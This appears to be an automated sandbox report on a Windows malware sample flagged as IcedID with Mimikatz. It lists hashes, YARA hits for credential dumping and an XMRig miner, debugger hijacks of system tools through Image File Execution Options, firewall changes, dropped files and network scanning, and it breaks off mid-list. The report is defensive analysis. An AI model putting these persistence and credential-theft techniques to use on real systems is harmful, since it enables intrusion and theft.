Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-11-2024 14:39
Behavioral task
behavioral1
Sample
2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe
-
Size
10.0MB
-
MD5
9a77aabf80abf4cfa362212a02da0b89
-
SHA1
a7e551c84ba91dc1ee8fe5c9a156301642ca72ca
-
SHA256
4625b6c8a2fddf1dfd6daa300dba3d23c05b0039e8ce53ca0d9fb120b0d9526c
-
SHA512
6c379cd05a498d23483f192afaa995e1430fd504e0f4106a4e76ea7cc2c6bee725616e705269e9f65c6eb5ba47b44f71089c04e3efa4f16f589b08a7e41bc3df
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2308 created 2044 2308 snutqkl.exe 37 -
Xmrig family
-
Contacts a large (28976) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4768-179-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-183-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-205-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-218-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-227-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-236-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-250-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-257-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-267-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-376-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-377-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig behavioral2/memory/4768-380-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3560-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3560-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c8a-6.dat mimikatz behavioral2/memory/1588-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4460-138-0x00007FF743B10000-0x00007FF743BFE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts snutqkl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts snutqkl.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe snutqkl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1456 netsh.exe 4176 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 1588 snutqkl.exe 2308 snutqkl.exe 452 wpcap.exe 1408 vltbbrlit.exe 4460 vfshost.exe 848 xohudmc.exe 1784 iulpaulua.exe 3472 bgvdci.exe 4768 jtpawa.exe 4952 iulpaulua.exe 3312 iulpaulua.exe 1252 iulpaulua.exe 2204 iulpaulua.exe 2236 iulpaulua.exe 2008 snutqkl.exe 1888 iulpaulua.exe 2000 iulpaulua.exe 4520 iulpaulua.exe 4748 iulpaulua.exe 3588 iulpaulua.exe 4968 iulpaulua.exe 4480 iulpaulua.exe 4800 iulpaulua.exe 3132 iulpaulua.exe 32 iulpaulua.exe 1100 iulpaulua.exe 1140 ngliteqrb.exe 2608 snutqkl.exe -
Loads dropped DLL 12 IoCs
pid Process 452 wpcap.exe 452 wpcap.exe 452 wpcap.exe 452 wpcap.exe 452 wpcap.exe 452 wpcap.exe 452 wpcap.exe 452 wpcap.exe 452 wpcap.exe 1408 vltbbrlit.exe 1408 vltbbrlit.exe 1408 vltbbrlit.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 66 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content snutqkl.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\bgvdci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\bgvdci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData snutqkl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF snutqkl.exe -
resource yara_rule behavioral2/files/0x0007000000023cde-134.dat upx behavioral2/memory/4460-135-0x00007FF743B10000-0x00007FF743BFE000-memory.dmp upx behavioral2/memory/4460-138-0x00007FF743B10000-0x00007FF743BFE000-memory.dmp upx behavioral2/memory/1784-146-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/files/0x0007000000023ce9-145.dat upx behavioral2/memory/1784-160-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/files/0x0007000000023ce6-164.dat upx behavioral2/memory/4768-165-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4952-172-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/3312-176-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4768-179-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/1252-181-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4768-183-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/2204-186-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/2236-195-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/1888-199-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/2000-203-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4768-205-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4520-208-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4748-212-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/3588-216-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4768-218-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4968-221-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4480-225-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4768-227-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4800-230-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/3132-233-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/32-235-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4768-236-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/1100-238-0x00007FF7C69F0000-0x00007FF7C6A4B000-memory.dmp upx behavioral2/memory/4768-250-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4768-257-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4768-267-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4768-376-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4768-377-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx behavioral2/memory/4768-380-0x00007FF633CB0000-0x00007FF633DD0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\mtemsclch\UnattendGC\specials\crli-0.dll snutqkl.exe File created C:\Windows\fpibtvet\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\Corporate\mimidrv.sys snutqkl.exe File opened for modification C:\Windows\mtemsclch\Corporate\log.txt cmd.exe File created C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\svschost.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\docmicfg.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\snutqkl.exe 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe File created C:\Windows\mtemsclch\UnattendGC\specials\tibe-2.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\tucl-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\wpcap.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.exe snutqkl.exe File opened for modification C:\Windows\fpibtvet\spoolsrv.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\exma-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\Shellcode.ini snutqkl.exe File created C:\Windows\mtemsclch\Corporate\mimilib.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\schoedcl.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\Packet.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\zlib1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\docmicfg.xml snutqkl.exe File created C:\Windows\mtemsclch\Corporate\vfshost.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\ssleay32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\xdvl-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.xml snutqkl.exe File created C:\Windows\fpibtvet\snutqkl.exe 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe File created C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe snutqkl.exe File created C:\Windows\fpibtvet\schoedcl.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\scan.bat snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\AppCapture64.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\AppCapture32.dll snutqkl.exe File created C:\Windows\mtemsclch\upbdrjv\swrpwe.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\cnli-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\svschost.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\spoolsrv.xml snutqkl.exe File created C:\Windows\fpibtvet\vimpcsvc.xml snutqkl.exe File created C:\Windows\fpibtvet\spoolsrv.xml snutqkl.exe File created C:\Windows\fpibtvet\docmicfg.xml snutqkl.exe File opened for modification C:\Windows\mtemsclch\taatftcev\Packet.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\coli-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\trch-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.exe snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\ngliteqrb.exe snutqkl.exe File opened for modification C:\Windows\fpibtvet\vimpcsvc.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\ip.txt snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\libxml2.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\schoedcl.xml snutqkl.exe File opened for modification C:\Windows\mtemsclch\taatftcev\Result.txt ngliteqrb.exe File created C:\Windows\mtemsclch\UnattendGC\specials\libeay32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\ucl.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.xml snutqkl.exe File created C:\Windows\ime\snutqkl.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\vimpcsvc.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\wpcap.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\posh-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\trfo-2.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.exe snutqkl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4836 sc.exe 5048 sc.exe 1956 sc.exe 2236 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened 